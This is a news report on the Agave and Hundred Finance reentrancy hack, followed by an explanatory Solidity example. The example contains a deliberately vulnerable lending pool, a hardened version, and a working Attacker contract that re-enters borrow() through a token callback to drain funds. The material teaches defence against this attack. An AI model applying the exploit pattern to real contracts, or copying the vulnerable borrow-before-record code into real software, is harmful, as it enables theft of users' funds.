A hacker stole nearly $11 million in wrapped Ether (WETH), wrapped Bitcoin (wBTC), Chainlink (LINK), USD Coin (USDC), Gnosis (GNO) and wrapped xDAI (wxDAI) in a reentrancy attack on the decentralized finance (DeFi) lending protocols Agave and Hundred Finance.
The attack came within 24 hours of the Deus Finance exploit, in which attackers drained more than $3 million in Dai (DAI) and Ether (ETH) from the lending platform.
According to CoinGecko, Agave's AGVE token fell 20% after the attack. Hundred Finance's HND token dropped 3.5% after the exploit was disclosed but has since recovered to a 24-hour high.
"Agave is investigating an exploit of the Agave finance protocol," Agave wrote on Twitter on Tuesday. "We will let you know as soon as we know more." The team said the contracts are paused until the situation is resolved.
Hundred Finance also tweeted that it had been exploited on the Gnosis Chain and had paused its markets while it investigates.
According to on-chain analysis, an address linked to the attacker sent more than 2,100 ETH, worth over $5.5 million, to a crypto mixer in an attempt to launder the stolen funds.
Related: Deus Finance exploit: hackers get away with $3 million in DAI and Ether
Shegen (@shegenerates), a Solidity developer and creator of an NFT liquidity protocol, tweeted that she lost $225,000 in the exploit. Her investigation found that the attack succeeded by abusing a callback function in the Gnosis Chain WETH contract: the callback let the attacker keep borrowing before the applications had recorded the debt and could refuse further loans.
The attacker carried out the exploit by borrowing again and again against the same collateral he had posted until the protocols' funds were drained.
Shegen told Cointelegraph that Agave's smart contract is essentially the same as Aave's, which secures $18.4 billion. "Every security researcher has tested it," she said. "So it is reasonable to assume that the contract is secure."
"I think this hack stands out more than some of the larger hacks," said Shegen, noting that although it was a smaller hack compared to others that stole millions, the resemblance to Aave means that it "looks safe at the highest level, but it was not, and it failed. Relying on it hurts."
"It's like you can't even trust 'secure' code."
Blockchain security researcher Mudit Gupta said the difference between Aave and Agave is that "Aave actively checks for reentrancy before listing tokens on mainnet to avoid such attacks."
Shegen said she does not blame the Agave developers for not preventing the attack.
"Agave was used in an unsafe way," she said. "Maybe the developer should not have allowed callback tokens on the platform, or should have added extra reentrancy protection."
"Curve, for example, was not hacked today because it has extra reentrancy protection, but I do not really blame Luigi and the Agave team, because it is not something that would normally happen, and it has gotten past many people."
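The borrow-before-record pattern described above, and the two fixes the quoted researchers suggest (a reentrancy guard, or not listing callback tokens at all), as an added example that is not code from Agave, Hundred Finance or Aave. The token's hook name `onTokenTransfer`, the pool's accounting and the loan-to-value ratio are all this example's own assumptions; the page only says the Gnosis Chain token has a callback that fires on transfer.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.17;

// Constructed interface for a token whose transfer() notifies contract
// recipients through a hook. The hook name/signature is an assumption.
interface ICallbackToken {
    function transfer(address to, uint256 amount) external returns (bool);
    function balanceOf(address who) external view returns (uint256);
}

interface ITokenReceiver {
    function onTokenTransfer(address from, uint256 amount) external;
}

// Minimal callback token for the illustration: the recipient's hook runs
// inside transfer(), i.e. in the middle of the caller's transaction.
contract CallbackToken is ICallbackToken {
    mapping(address => uint256) public override balanceOf;
    constructor(address to, uint256 supply) { balanceOf[to] = supply; }
    function transfer(address to, uint256 amount) external override returns (bool) {
        balanceOf[msg.sender] -= amount;   // checked arithmetic, reverts if short
        balanceOf[to] += amount;
        if (to.code.length > 0) ITokenReceiver(to).onTokenTransfer(msg.sender, amount);
        return true;
    }
}

// Vulnerable pool: pays out the loan before recording the debt.
contract VulnerablePool {
    ICallbackToken public immutable token;
    mapping(address => uint256) public collateral; // native coin deposited
    mapping(address => uint256) public debt;       // token borrowed
    uint256 public constant LTV_BPS = 5000;        // borrow up to 50% of collateral

    constructor(ICallbackToken t) { token = t; }
    function deposit() external payable { collateral[msg.sender] += msg.value; }

    function borrow(uint256 amount) external {
        // Health check reads debt[] that is not yet updated for the borrow in flight.
        require(debt[msg.sender] + amount <= collateral[msg.sender] * LTV_BPS / 10_000, "undercollateralized");
        // Interaction before effect: transfer() calls back into msg.sender ...
        token.transfer(msg.sender, amount);
        // ... so the attacker has already re-entered borrow() and passed the
        // same check again before this line ever runs.
        debt[msg.sender] += amount;
    }
}

// Hardened pool: effects before interactions AND a reentrancy guard.
// Either alone closes this bug; keeping both is defence in depth.
contract HardenedPool {
    ICallbackToken public immutable token;
    mapping(address => uint256) public collateral;
    mapping(address => uint256) public debt;
    uint256 public constant LTV_BPS = 5000;
    uint256 private _entered = 1;

    modifier nonReentrant() {
        require(_entered == 1, "reentrant call");
        _entered = 2;
        _;
        _entered = 1;
    }

    constructor(ICallbackToken t) { token = t; }
    function deposit() external payable { collateral[msg.sender] += msg.value; }

    function borrow(uint256 amount) external nonReentrant {
        require(debt[msg.sender] + amount <= collateral[msg.sender] * LTV_BPS / 10_000, "undercollateralized");
        debt[msg.sender] += amount;          // effect first
        token.transfer(msg.sender, amount);  // interaction last
    }
}

// Attacker: re-enters borrow() from inside the token's transfer hook.
// Deploy with VulnerablePool and some collateral; against HardenedPool the
// nested borrow() reverts with "reentrant call" and the whole call unwinds.
contract Attacker is ITokenReceiver {
    VulnerablePool public immutable pool;
    uint256 public rounds;

    constructor(VulnerablePool p) payable {
        pool = p;
        pool.deposit{value: msg.value}();
    }

    function attack(uint256 amount, uint256 n) external {
        rounds = n;
        pool.borrow(amount);
    }

    function onTokenTransfer(address, uint256 amount) external override {
        // debt[] is still 0 here, so the same health check passes again;
        // stop when the round budget or the pool's token balance runs out.
        if (rounds > 1 && pool.token().balanceOf(address(pool)) >= amount) {
            rounds -= 1;
            pool.borrow(amount);
        }
    }
}
```

With one deposit of 1 ETH the vulnerable pool lets `attack(0.5 ether, 10)` walk away with 5 tokens against 0.5 tokens of borrowing power, because every nested `borrow()` is evaluated against a debt balance of zero. The third mitigation on the page, Mudit Gupta's "check for reentrancy before listing tokens", is a process control rather than code: a pool that only lists tokens without transfer hooks never reaches the callback in the first place.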